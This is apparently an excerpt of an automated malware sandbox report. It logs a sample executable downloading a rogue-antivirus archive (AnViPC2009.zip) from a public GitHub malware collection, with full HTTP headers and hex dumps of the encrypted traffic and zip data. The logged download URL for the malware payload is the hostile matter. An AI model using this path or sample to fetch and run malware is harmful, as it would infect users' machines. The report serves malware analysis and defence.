                                                                                                        2022-09-29 12:46:11 UTC10446INData Raw: c4 5a 8a 9e 81 cf ca 29 6c 17 c5 e4 91 98 a2 c6 7a ce 79 d6 d9 87 6f 5f 02 ba 8a e4 36 33 36 d7 fa 3c 96 51 b2 8e 54 69 35 0c c2 49 b1 9c 01 3f 6c 75 c5 37 d5 94 44 49 7e 5a 0d db 07 3d d2 4a 6b 03 dc 4c d1 cf b7 5e 31 d5 0c 8d a0 a7 2a 8c 3c 76 de 80 84 b8 45 d7 f2 9d d4 42 4a 2c f5 93 1c 38 88 52 e6 ec d7 f0 ca 78 9d 87 8c f2 f7 90 5c 9d 9e 2d 37 c1 24 e9 34 31 58 ef 0d 21 31 7d cd 7f 98 77 a4 e4 83 48 d5 18 19 e8 1b 3e 99 9f f7 c0 16 f2 10 55 9f d9 f9 25 06 7b a4 d9 82 7c 79 d6 f9 69 21 46 c7 84 dd 84 ef 5b 8a f2 a8 67 07 1c 86 fe 9b 7e e7 35 42 38 12 0c 4c 41 97 a9 3f 5a a9 8c 0a 24 e7 df 3f e8 43 4f 38 d4 58 0c 90 90 b1 9e 81 78 5a f9 9d b2 34 39 d7 61 9a d7 5c 17 7a 5c 6f a7 2d 42 6a 71 70 55 aa c9 e6 c4 de 93 6c 08 df 74 91 e0 8f 10 8d 55 3a 64 4d
                                                                                                        Data Ascii: Z)lzyo_636<QTi5I?lu7DI~Z=JkL^1*<vEBJ,8Rx\-7$41X!1}wH>U%{|yi!F[g~5B8LA?Z$?CO8XxZ49a\z\o-BjqpUltU:dM
                                                                                                        2022-09-29 12:46:11 UTC10462INData Raw: 9b da 10 64 f7 14 e8 65 20 31 b2 28 fc e9 a1 19 e8 b4 ee 50 7f 77 15 56 5a 05 1c 65 a0 52 cf 36 0a 9f 69 7e 3b 33 c4 c2 7d d7 bc 78 19 41 71 7a 78 2c 32 5e b9 21 65 88 96 03 3b ac 6b a5 b6 69 4c 15 5b ea d5 ad 7a 32 35 ef 8a bf a9 19 39 b3 f6 48 70 b5 4b 6c 2d f2 ec 4d 4f 82 40 2a 5d d8 35 3a 1a 29 92 e4 35 a9 91 40 50 53 f6 1f ec 44 12 72 ea ea 45 2c 8e ea d6 01 b6 23 aa 52 a5 44 ba 20 99 d5 25 24 17 76 bb 68 e7 60 a7 41 66 ee c6 d4 14 31 8e cd 62 94 cd cf 96 5b 8a 60 6f 7d 8e a7 96 aa 98 13 50 48 76 ab 81 71 70 83 3d e2 8c d6 54 c7 71 2f 12 d5 0e 8e 5f 45 98 37 9b 1e 5d f2 9d b0 cc ea 97 db 83 5b 90 d8 00 3f 5b 9a 2c 78 1b d9 2d 98 be 51 a1 f6 04 45 41 71 0c 37 37 25 58 7d f6 7f 67 4f 2e ad 88 fe 8d c7 67 09 c9 45 dc fd 3c 6b 0a 6a 26 b4 16 73 d0 86 12
                                                                                                        Data Ascii: de 1(PwVZeR6i~;3}xAqzx,2^!e;kiL[z259HpKl-MO@*]5:)5@PSDrE,#RD %$vh`Af1b[`o}PHvqp=Tq/_E7][?[,x-QEAq77%X}gO.gE<kj&s
                                                                                                        2022-09-29 12:46:11 UTC10478INData Raw: f3 ff 20 64 17 aa 27 2c 0e 83 94 04 1a e4 36 62 03 45 50 cc 48 6d f9 72 f3 d0 eb 42 ec 2b cb 93 3c e7 0e 8f c8 08 1a 6e a5 0d 10 8a 23 e5 fc 87 1a e7 ae 21 8b 77 49 88 20 e2 89 13 5c d8 6f e5 3e a9 38 a5 b5 67 cf fc b0 59 71 e9 6d 29 0e 15 07 18 61 35 66 bf 01 f8 56 a4 e6 68 2a 4a 0b 09 53 4f f9 09 45 33 dd b0 6d e9 79 e7 19 df 06 cd be e6 6a 74 88 3a a5 d1 5c 7e 02 78 15 a4 6b fd ee 08 45 b3 fc 00 4d 9d 0e f0 7e 64 b8 39 a4 14 fd 43 c7 5a 0e fa 29 a2 ad ee be f3 87 91 97 79 a7 3f f3 68 54 d1 f8 7d b2 94 ef 88 c9 8d bd fe e1 41 50 ce 6e 0d ed c0 d2 d3 8e 8f 75 1b 07 8d 12 8b f6 99 6c 42 be b2 60 7c 9a 84 d6 01 53 03 7f 64 0f 30 f4 b8 bb 5b 80 5e a9 b2 08 7e b8 1f 94 bd 36 f8 9c 90 97 14 b3 6c d9 d2 3d 7a e4 75 2a f2 98 f1 2d 7d c5 49 08 df bc c6 54 fe 22
                                                                                                        Data Ascii: d',6bEPHmrB+<n#!wI \o>8gYqm)a5fVh*JSOE3myjt:\~xkEM~d9CZ)y?hT}APnulB`|Sd0[^~6l=zu*-}IT"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        34192.168.2.449780140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:21 UTC10480OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:21 UTC10480INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:22 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:21 UTC10481INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        35192.168.2.449781185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:21 UTC10483OUTGET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:21 UTC10483INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 1178406
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "4b7f39242bdc3c2d1323de2cf6529b8807eb1cfe6f7dc4241f8df746b2145355"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 0866:67BD:BA80D:1793D0:6335928F
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:21 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6934-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455581.447646,VS0,VE2
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 519fd3c5162c5533b08ea69ee350726e3ab481f5
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:21 GMT
                                                                                                        Source-Age: 270
                                                                                                        2022-09-29 12:46:21 UTC10484INData Raw: 50 4b 03 04 33 00 01 00 63 00 c3 5c f5 3c 00 00 00 00 58 fa 11 00 5a bb 12 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 56 69 50 43 32 30 30 39 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 18 1e 19 ad d3 ff 2d 34 78 35 ff b8 e5 42 12 9c 05 07 97 5d 8c 1a 3c eb c6 99 7d 87 2f 61 b9 e2 28 ee 82 71 5c ce 7b 7c 30 98 9b eb 94 90 c9 3c 15 7b b7 9c ba 5f ff 0a 3a ba bb f0 04 ba 43 3a ee c9 99 f4 b2 d8 3c 52 0e eb 5c 5d b2 e2 78 a5 65 02 53 2a 04 41 4d 0f 32 09 f9 96 bf d5 21 02 00 db 0f 54 dd fd 79 94 e9 75 e8 be e9 32 91 5f 70 01 4e 0b b8 02 bb c3 53 72 9f ea f9 c2 8c 2f 31 b8 0f 6f 9e 32 7f 96 1e 1d 26 00 13 55 a5 44 92 af a0 7a 25 bb ba 49 a6 1f 52 6e 15 0e 72 dd 98 30 df ba c9 10 ed e7 c7 80 d6 00 cf 6d e4 2c 60 84 51 9a 88 a2 aa d4 0c dd 3c eb db
                                                                                                        Data Ascii: PK3c\<XZEndermanch@AnViPC2009.exeAE-4x5B]<}/a(q\{|0<{_:C:<R\]xeS*AM2!Tyu2_pNSr/1o2&UDz%IRnr0m,`Q<
                                                                                                        2022-09-29 12:46:21 UTC10500INData Raw: cf f6 97 48 9a 3d 81 d3 e5 7b 8b fb 29 1e a1 19 0b 9f 5b 23 2a a1 10 fc e5 4f b0 32 ff e1 9c f6 68 5c db 1a 17 59 45 46 73 02 cd 58 24 ec 2c 62 56 87 4d 7f 84 43 8c a7 1d de ae b1 d7 fc a0 10 02 a8 4a 00 26 60 61 59 71 ef b6 48 4c 0e d2 82 9e ee c6 bb e2 0a 93 42 b5 ce ab 81 dc 59 f7 a5 78 68 b2 52 65 50 52 94 90 21 f6 8d 86 06 7f 11 2e 6f 50 21 f8 ab 70 36 94 8c 08 0c 67 d3 aa b7 74 4a 98 72 42 1d 20 e6 63 92 2b 24 82 3c 56 af ca 2f a2 50 16 8f 32 ad fa c8 50 58 5d c6 70 84 b1 c0 c2 a6 10 09 59 9d 50 09 d8 91 a2 19 76 8b 34 d6 55 48 57 fb 3d 08 48 8d 0e a2 16 e6 e2 06 25 d8 a7 38 1c 2f 67 d4 fc 72 53 2f 7e 16 9c b0 a9 6b 1f ec 48 9f 17 bc ba 31 4f ad 78 09 30 b2 31 ef f4 d2 29 3f 5b eb 8c 98 8c fb 6e 01 ce fb 60 a5 e8 31 45 15 9d 82 84 8c fd c3 e8 76 45
                                                                                                        Data Ascii: H={)[#*O2h\YEFsX$,bVMCJ&`aYqHLBYxhRePR!.oP!p6gtJrB c+$<V/P2PX]pYPv4UHW=H%8/grS/~kH1Ox01)?[n`1EvE
                                                                                                        2022-09-29 12:46:21 UTC10516INData Raw: df 81 c2 fc b3 1f ec f9 3b 05 fa ff 9c 5d 23 d5 6f ef 4e 6d 1f e7 16 c7 0e 8b 76 95 c0 38 17 c8 70 b4 6a 4f 5e 4c 00 29 77 7c 8f 76 04 b9 23 40 e1 c7 34 3c 79 20 1d 85 dd 5d aa 7d c8 35 40 1d 53 d9 46 9c d6 13 b8 b2 48 a0 d3 3b 0e ed d3 cc a4 f3 ae 91 ce 82 c6 2a f8 39 db 90 6d d1 97 1c f2 6b 3d f7 4e 43 b9 7f 94 9a 09 ef 1f c5 a0 6b c8 e9 94 91 6b bd fe 88 13 7f 09 13 27 dd c4 33 03 4e e9 28 a0 c4 63 33 6b 49 bf cd a7 a0 cd 20 23 cb c6 4c 6a 0e bf aa d1 57 1c 99 55 13 9c a3 c2 65 03 db a5 a9 31 cd 9b 62 56 93 89 4a 9a 6d f8 70 6c 77 79 db d9 12 64 13 dd a2 60 a9 80 b9 71 f5 e8 6a aa 7e 76 0b 16 7c de 5b a5 3d a1 b9 4e 35 28 a2 7e 3e a3 06 e4 73 57 b4 2e 1d 4e 54 64 e6 25 68 84 b7 86 5d 55 6c 13 f2 69 5f df 28 b1 b8 e0 fd 86 48 c1 28 84 fa 23 0f d4 c4 bc
                                                                                                        Data Ascii: ;]#oNmv8pjO^L)w|v#@4<y ]}5@SFH;*9mk=NCkk'3N(c3kI #LjWUe1bVJmplwyd`qj~v|[=N5(~>sW.NTd%h]Uli_(H(#
                                                                                                        2022-09-29 12:46:21 UTC10532INData Raw: 1f 48 91 2c e2 55 47 01 b2 7c 70 82 cc 0a 5e e2 c3 f1 78 79 33 a8 8d c7 aa 1a 0c 4c f6 62 62 48 fc 21 b8 5a cf d5 a0 3b e6 93 32 5d 2c 22 f8 6f d3 a8 e1 21 7c 1c db fd 83 21 35 ea e8 78 bd fc cf 61 01 da cc 6c 79 36 68 b4 d7 04 e2 80 18 a9 61 93 d3 65 d9 dc 3c 9c 96 a3 19 2a 28 9f 10 66 92 ed 31 06 7a 6e 6e 53 ac a4 3b 74 d6 43 5a 90 b7 ae 64 63 65 a0 97 23 22 9b 9b f8 8f 03 7c 4e 7a e6 d1 9a 65 2a b5 a4 cc 1d 5e 69 76 36 6c e1 f8 71 30 3a 98 22 60 23 f3 ea b5 43 cf ef 17 4c a8 6d 57 0a 18 73 40 ea 83 e1 44 fd e3 2f c5 bb 03 db 1b 0d 24 a8 b5 85 a5 47 15 a1 6d 13 0a f8 17 f6 42 96 6d 7b 96 a1 78 c3 62 e0 0b 87 2f 17 be 5b b2 43 36 cd 7f 5f 3f b6 63 ef cd ac 1c 41 7c 31 51 6d 62 d3 95 5c 81 9b a1 62 72 f3 5a 69 03 05 0f eb 98 76 78 66 02 47 71 66 4f d1 1d
                                                                                                        Data Ascii: H,UG|p^xy3LbbH!Z;2],"o!|!5xaly6hae<*(f1znnS;tCZdce#"|Nze*^iv6lq0:"`#CLmWs@D/$GmBm{xb/[C6_?cA|1Qmb\brZivxfGqfO
                                                                                                        2022-09-29 12:46:21 UTC10548INData Raw: 21 a9 50 4c e9 65 6c 71 a0 52 96 63 b1 5b cb 08 06 bf 77 53 fb 7a ed 4e 9c cb 2e ac 00 19 ad 16 81 c0 ab 8f dc 66 94 05 3b 6c 12 b6 a0 3c df 68 02 82 d2 4d ec 15 8e b8 76 91 97 1e af e8 60 15 8a fa c7 9c ac 5a dd 52 e6 05 03 59 7d b2 f4 8a 69 1e 01 a2 27 76 7c ac 8d 30 68 9f a3 4c aa 67 e9 8d c8 b3 a5 0f 17 0f c9 e7 47 f7 16 5e 41 35 54 13 83 c1 e3 8d 20 f8 f1 e8 a1 c5 ae 50 6c 2c bd 55 aa 26 e9 d4 f2 3f 7a 2f ba 75 db 3e 49 35 8b e6 56 66 82 06 57 08 72 55 28 f1 ee 96 0f a8 20 51 1b 64 0a 87 d4 37 3e b3 8f 29 38 87 fa 1a 10 c0 47 a2 b9 4a 01 87 08 38 a0 b8 a0 fa 55 e9 06 a4 23 70 e4 92 b2 a9 3e 18 11 40 58 9c 57 3f 78 9b 49 94 1f ec 8e 70 54 e7 16 89 25 f7 95 76 72 c4 d8 42 68 03 ec 8e 32 6a 51 8c 86 e5 d3 ee 93 de e3 3b 11 a7 65 f5 69 75 40 92 a4 9f f4
                                                                                                        Data Ascii: !PLelqRc[wSzN.f;l<hMv`ZRY}i'v|0hLgG^A5T Pl,U&?z/u>I5VfWrU( Qd7>)8GJ8U#p>@XW?xIpT%vrBh2jQ;eiu@
                                                                                                        2022-09-29 12:46:21 UTC10564INData Raw: c6 b3 f4 c2 96 26 d8 78 d8 ff 53 df 68 b2 32 b6 6a 8b a1 85 33 ed ac e4 d5 a9 50 5e 9b 59 db cc dc c9 f3 5e ef 85 28 6b cd 29 d9 7c 60 3a 9a be cc 39 ad fc ea 40 8a 17 e9 d1 e3 2d 95 62 4a 78 f2 e9 fc 53 9e ef c6 b3 37 e3 65 0f 3d 69 8e dd a5 5e 27 55 26 98 33 b5 40 fe b5 d1 68 81 b3 e6 ba 3a fe 74 42 db 2a 99 7c 07 d7 79 96 4b b4 5d 11 46 c1 f2 17 55 53 42 3f 21 64 83 df d8 a0 8b 53 af ae c6 85 22 d5 e4 0d 77 d9 ee 24 02 82 cd 3d ac 57 e5 78 30 d9 67 5e fd 54 09 5d 38 85 c6 ae f2 85 fe 3f cb b2 db c5 b5 3f de 8a ec df 4e 5c a2 b1 05 79 b6 6a d7 a3 e2 3a 0e bd 16 18 33 86 c5 cf e3 99 22 88 be cc 92 9a 73 d0 b2 89 08 df d8 a5 8f 3d 9b b3 6f b0 71 03 ed 10 6c e5 3c a7 53 11 b6 47 f0 32 bc a8 a9 46 6d a6 45 46 69 a4 ee fa 92 33 f5 65 4e 46 4e f4 5a 70 8f 28
                                                                                                        Data Ascii: &xSh2j3P^Y^(k)|`:9@-bJxS7e=i^'U&3@h:tB*|yK]FUSB?!dS"w$=Wx0g^T]8??N\yj:3"s=oql<SG2FmEFi3eNFNZp(
                                                                                                        2022-09-29 12:46:21 UTC10580INData Raw: 87 36 79 5a 7e 3c 67 0f 4b 93 94 8d 2d 02 64 4f d1 b7 6a b0 ac ee b2 46 b3 75 7a c1 41 8a 8e c3 a8 04 4e d7 85 69 8e 14 5f 93 5a 79 36 83 6c ce 82 a5 1e 18 76 76 00 87 27 f6 34 ff 9b f8 cd fe a1 0c ac 6e 16 5c 8c b0 64 8b db ff a3 9c 95 d9 e1 06 ee 81 f8 fe d2 e7 1e 4e f3 b1 be e8 18 67 65 1b 01 a1 57 a7 77 0d ad d5 a4 22 20 44 31 ca ff 55 24 0e 5f 8c 8d bb 6a 57 81 4c 57 9e 70 85 7b a4 31 8c d8 5d 25 a2 58 5f 80 81 91 5c 5e 8d 17 24 42 cb d7 47 1f b9 27 17 08 8b 8c a3 13 e0 5f bd 12 46 e8 8e 08 45 1f be 04 19 9c ad 3e ca d7 27 20 95 b3 96 4b f7 58 f9 3a c5 8c 3a 21 ce a7 68 e5 f8 03 be e9 b0 a2 eb 42 b2 e2 9e 5d b3 59 5e 8b 23 f8 ea 1d 30 7e 7e 4d 90 a2 b0 91 ad a9 16 2e ce 98 8c f6 87 36 76 90 dd 36 80 37 76 18 c1 57 18 70 b9 b1 73 86 b3 76 a4 53 81 41
                                                                                                        Data Ascii: 6yZ~<gK-dOjFuzANi_Zy6lvv'4n\dNgeWw" D1U$_jWLWp{1]%X_\^$BG'_FE>' KX::!hB]Y^#0~~M.6v67vWpsvSA
                                                                                                        2022-09-29 12:46:21 UTC10596INData Raw: 92 5e da 1e 97 91 8e fa aa 64 85 4d ba ba cc 6a 00 55 1b c4 cd 10 c1 84 08 e7 53 70 3b ea a4 cb 42 62 26 19 fe 69 f8 5b db e6 ed 52 b5 74 e7 11 75 9a cc d9 49 b3 13 7a e0 a1 b0 70 82 48 30 cb 37 2c f4 32 5b cf f1 3c f8 55 8b e9 38 e2 b1 bd ec 1a ea 14 04 50 41 b3 83 8d 7d 9d f5 ac c3 48 db 2d 65 c8 a4 92 0a ee 1f 34 a7 07 98 63 f3 de e0 a1 6f 25 2e c2 d6 46 9f c5 2a ee cb 11 fe 70 b0 2e 90 58 ed 36 3a 8d b0 e4 ea 17 d9 57 bb c5 e7 42 be 4b 9c 6f 1f 59 f7 21 e8 01 68 14 2a 63 03 8d 69 0e 49 45 5d ab 22 72 fe 23 62 9e 33 22 c1 36 7a 86 39 f8 50 73 c0 eb 2e e8 fe ef 43 bb 7a 5b 7f 36 9c 3b 55 79 b4 21 00 de 1e 79 25 51 a3 fc 5d 7f 83 88 20 51 b8 76 98 ed 05 62 37 d1 e1 76 ea fc c0 01 c4 08 49 2f ad b7 79 c3 7c 11 0f 0f f1 91 67 2d 26 72 4d 2f 53 ec 4f bd 94
                                                                                                        Data Ascii: ^dMjUSp;Bb&i[RtuIzpH07,2[<U8PA}H-e4co%.F*p.X6:WBKoY!h*ciIE]"r#b3"6z9Ps.Cz[6;Uy!y%Q] Qvb7vI/y|g-&rM/SO
                                                                                                        2022-09-29 12:46:21 UTC10612INData Raw: 44 b1 9b d0 0e f7 31 59 66 98 9c d6 f8 2e 62 ce 87 3d 5b 8c 11 8f ec e9 66 89 f9 9b 38 3b 18 9e cc 7d da 16 58 3d c7 89 9a 3e 09 a7 a4 f2 b1 87 c5 6f 11 d6 58 ee 28 06 f8 9c a4 ea 88 7b 59 9d 7e be 89 8b fb c9 72 55 49 c7 43 00 30 dc 90 ec 07 bd f7 89 11 f1 c0 45 b6 f8 97 ad a6 55 b6 51 06 ca 88 c1 dc be 81 e4 24 3b 9b b6 dd ed 8b 7b 92 87 07 88 71 b9 ab b4 39 b2 e5 63 c9 ba 6f 04 65 f0 81 6b 86 b7 f5 3a d9 13 99 2b ea de 6a 7c a2 fc 49 fc 9d 77 fd 91 42 d6 8f e3 77 6e 78 7e c8 2e ba c3 98 fc 31 8e e0 0e 04 59 ba c8 c3 80 c4 5e 92 11 28 c4 46 ec d3 ae e4 2d 17 b3 2e eb f4 88 50 3e 4b ee 1a c5 b2 43 aa a8 05 c9 ba 77 a9 fb 62 59 be f5 66 f3 5f 55 3d 8b cd c8 32 a6 fb c8 f8 8a 6e 69 1b c6 bc 28 c5 9c fd fc 1d ef c9 0e 3a e3 17 72 b8 30 e7 cf d7 fa bc 21 61
                                                                                                        Data Ascii: D1Yf.b=[f8;}X=>oX({Y~rUIC0EUQ$;{q9coek:+j|IwBwnx~.1Y^(F-.P>KCwbYf_U=2ni(:r0!a
                                                                                                        2022-09-29 12:46:21 UTC10628INData Raw: 93 97 3d 21 6f 40 7b e0 4b c6 ea e0 a1 6e 78 4e 56 76 45 74 20 26 39 89 65 0d f6 2d 37 a5 05 93 9a 40 a1 4d 3d 6d e9 74 06 ad 64 71 4e f4 c1 4b 40 d4 87 2d 22 b3 6e 2f a5 e7 96 44 9a 11 99 21 cc df 39 9f e5 64 0a 3d f7 97 7a 78 ea df 39 2d de 66 43 61 bf ee 7c c0 31 c6 19 b8 5a a3 1c c3 22 0c c0 31 d3 e4 ee 2c 5e cc 8c 2a 71 b1 db dc 66 d1 91 7d 49 4b d2 e1 6e 93 2e d1 a4 ab af ef 25 af ab 60 10 57 67 0e 51 b4 e3 ec 0e d2 75 98 c0 dd 47 ae 2b b7 6c 67 36 b4 9f cd 05 19 c3 a3 de d3 2a 8a 63 24 32 f4 89 3c fb a6 62 d6 2e 04 00 79 51 01 f7 73 59 c7 92 ff 49 0b 11 60 82 f9 9b 7c 52 14 3f b9 6d e5 2e 09 24 a0 b0 ad ec cd ea f8 71 5b 6f 99 cc 89 37 02 80 ed 38 0c 53 c9 c0 2e b1 04 bd 56 c2 2b 37 1e 08 bd 00 10 f3 7f 6e 73 61 f6 a0 fb 5a 82 7d cb 16 50 a2 21 e1
                                                                                                        Data Ascii: =!o@{KnxNVvEt &9e-7@M=mtdqNK@-"n/D!9d=zx9-fCa|1Z"1,^*qf}IKn.%`WgQuG+lg6*c$2<b.yQsYI`|R?m.$q[o78S.V+7nsaZ}P!
                                                                                                        2022-09-29 12:46:21 UTC10644INData Raw: 98 e6 70 17 dc 8e 96 fb 9a 7e 6b 53 bd 29 ff a1 c1 f6 09 9f 9c b7 0f 0f f7 af c7 a2 c2 82 c3 a9 55 72 30 2b fd 21 7f 57 76 d5 ea ce 3c 17 f9 a7 97 0d fd 0b b8 ba f4 f5 15 a0 5d fc cb a5 dc a3 f6 57 96 af 2b f8 69 5b f5 3a e6 ba 2c ce 87 a7 92 d1 37 02 a2 d8 85 c8 4f c6 e4 8c 5d cd a7 51 02 00 6c e3 9d 9a 41 65 49 96 71 7f a2 0c 3b bc 85 4e fd 6c ed a9 2d 6e 8e 0d 10 83 16 12 a1 9e 27 53 9d 73 68 d0 0d b1 9d b5 31 35 a7 8e 50 97 c4 f5 7c b8 88 c2 9f 23 15 6d cf 06 8a 55 a2 7c 40 e5 1a 93 55 9f 4e 81 56 2f 35 63 5b b7 d8 e0 f6 c0 42 75 a6 9c 06 a3 69 d5 5b ff ec 1c fc 86 04 6c ae cb 58 c9 c1 55 9b 02 44 43 fa f4 12 3e c9 f1 16 34 ba 0e fa 54 f8 2e 8b f0 cc 40 49 20 42 69 72 b8 9c ed 72 36 53 8a 22 9a c5 db d2 71 d7 4a 39 ee 62 f5 72 85 39 64 0e 44 9d 9b 26
                                                                                                        Data Ascii: p~kS)Ur0+!Wv<]W+i[:,7O]QlAeIq;Nl-n'Ssh15P|#mU|@UNV/5c[Bui[lXUDC>4T.@I Birr6S"qJ9br9dD&
                                                                                                        2022-09-29 12:46:21 UTC10660INData Raw: f8 da 28 22 1f d9 da c9 46 38 be 1b 82 ee d0 d6 a6 b8 7b 72 42 d7 fe 3e 6e 17 ac 0f 56 4e 61 0b 96 19 85 e2 d2 9c c6 85 90 b5 61 5e 18 bd 5d 92 2f 0f 20 69 00 7e a8 b2 cd 0e c7 86 14 9e 2f ec f6 7b 7f 87 b8 52 d6 f3 57 5c 19 4e bb b1 ce 70 9c 52 4a 15 2a f4 9d 06 94 19 9e 75 a2 4f 7a fc 36 10 a3 4c d0 64 6b f5 df 03 c0 e5 7b 2a c0 4f f4 01 d5 d7 b2 85 09 56 62 0a cc 19 6e ac 1d fd fa 4f 82 9a 3b 9e e4 69 8e d0 0a d1 bc 63 43 b0 f3 cf e6 5b 40 cc 1e b3 a3 ba db cd 3c 79 13 58 e2 78 15 1a 8c b1 4e de 1e 83 02 7b 4c 2d 9b 13 67 ac 6c f5 cf 41 67 9f 0c 44 d6 20 44 6e 1b 67 ff 5c b0 83 b3 d8 7f 35 f4 47 0d 05 80 9d 68 ab b8 4c 00 00 44 99 5f d2 59 22 e6 8e e4 0e 8a d5 3d 6f 82 3c ca ab fa 22 3d 93 c0 38 7b 0b be 44 99 c7 c1 4f 07 e7 e2 3d af 0e 35 6e 19 1c 6b
                                                                                                        Data Ascii: ("F8{rB>nVNaa^]/ i~/{RW\NpRJ*uOz6Ldk{*OVbnO;icC[@<yXxN{L-glAgD Dng\5GhLD_Y"=o<"=8{DO=5nk
                                                                                                        2022-09-29 12:46:21 UTC10676INData Raw: 98 c4 44 b8 41 80 0b 67 fc d4 ea 35 e2 cc b1 68 34 da 98 8f 3f 2d a0 e3 89 c5 fb 40 cc 75 7d 89 57 09 6f d1 47 c1 3b 1c 91 d1 c0 03 7f 40 93 4d f9 a9 6d 5e a5 e5 24 4a 18 e6 7d 1c 08 88 99 99 6d 0f df 91 7f ad de 3f df 43 f2 1d 81 1a 1c af cf a9 91 f1 be c4 46 88 39 aa 9b 35 2f 59 a0 08 8b 02 58 21 c8 97 f8 15 51 d3 68 42 86 6f 62 1e aa b0 95 c0 ed 77 fe 67 7c e8 a5 d2 ab 3d df b3 56 7d 96 fc 92 c1 ef d1 ff 55 5c 17 6c 42 bd b4 98 04 65 80 44 7f 6a f5 02 21 90 02 d0 9f 4b 9e e3 4d 14 c4 73 13 43 cd fb 56 28 a8 2b a4 7a e5 ef 31 73 60 aa f5 91 80 fb d8 04 ee 98 7d e9 44 4e 85 8a 58 ff 53 f1 8a 26 0d 69 ed 12 70 45 fd d1 36 56 d7 03 19 d3 a7 5f 83 ce af aa 5c 1a ed 8a 81 d4 2e d4 27 06 64 39 a5 ab 1e 4a 36 e1 b8 5a 35 dd 8c 9f 4e c6 a8 ba a4 4c b5 45 fd 40
                                                                                                        Data Ascii: DAg5h4?-@u}WoG;@Mm^$J}m?CF95/YX!QhBobwg|=V}U\lBeDj!KMsCV(+z1s`}DNXS&ipE6V_\.'d9J6Z5NLE@
